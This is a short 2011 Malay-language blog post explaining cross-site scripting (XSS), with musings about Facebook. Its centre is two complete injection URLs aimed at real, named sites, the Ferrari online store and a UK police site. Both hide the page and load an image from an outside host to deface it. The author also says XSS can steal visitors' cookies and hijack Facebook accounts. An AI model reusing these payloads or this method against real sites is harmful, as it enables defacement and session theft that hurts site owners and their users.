Thursday 13 October 2011

XSS Pada Facebook?

Assalammualaikum...

Rasanya dah lama tak update blog ne... Macam dah berhabuk je, traffic pun makin menurun... Hehe

Kali ne kita akan bercerita mengenai XSS atau Cross Site Scripting pada FACEBOOK? FACEBOOK? Oh no... Takpa kita tengok gambar dulu...


Amacam? Hehe... itu salah satu contoh sahaja bagaimana XSS berfungsi... Tapi yang saya buat tu hanya menggunakan menyebabkan ALERT.

Kalo betul Facebook kena XSS mesti ramai deactive akaun kan?

XSS atau Cross-site Scripting adalah satu malicious code yang di inject pada URL laman web untuk memaparkan Javascript kepada mereka yang membukanya.

Jom tengok contoh di bawah ne :

1. http://store.ferrari.com/en/search/show/?keywords=%3Cstyle%3Ebody{visibility:hidden;}html{background-image:url%28http://i27.lulzimg.com/9b6f618414.png%29;}%3C/style%3E%3Cdiv%20style=%22position:absolute;left:420px;top:40px;%E2%80%8B%E2%80%8Bz-index:10;visibility:visible;color:White;font-size:40px;%22%3E%3C/div%3E


2. http://www.gmp.police.uk/live/nhoodv3.nsf/index-divisions.html?ReadForm&Division=%3Cstyle%3Ebody{visibility:hidden;}html{background-image:url%28http://i27.lulzimg.com/9b6f618414.png%29;%20}%3C/style%3E%3Cdiv%20style=%22position:absolute;left:420px;top:40px;%E2%80%8B%E2%80%8Bz-index:10;visibility:visible;color:White;font-size:40px;%22%3E%3C/div%3E


Itu adalah contoh XSS daripada page Police UK dan Ferrari Store.

Dengan XSS, korang boleh curi cookie orang yang buka URL tersebut.

Tapi yang aku buat tadi, bukanlah untuk curi cookie, tetapi hanya menggunakan gambar aku dan letak kat Background web dorang secara sementara.

Bayangkan kalau terdapat XSS vulnerable pada Facebook. Memang asyik lawan hijack je la Facebook member.

Untuk lebih memahami XSS korang kenalah memahami JAVASCRIPT kerana korang akan menggunakan SCRIPT 100% dalam membuat XSS injection.

1 comment:

Falling . said...

npe la sy x bule phm bab bab nih ;(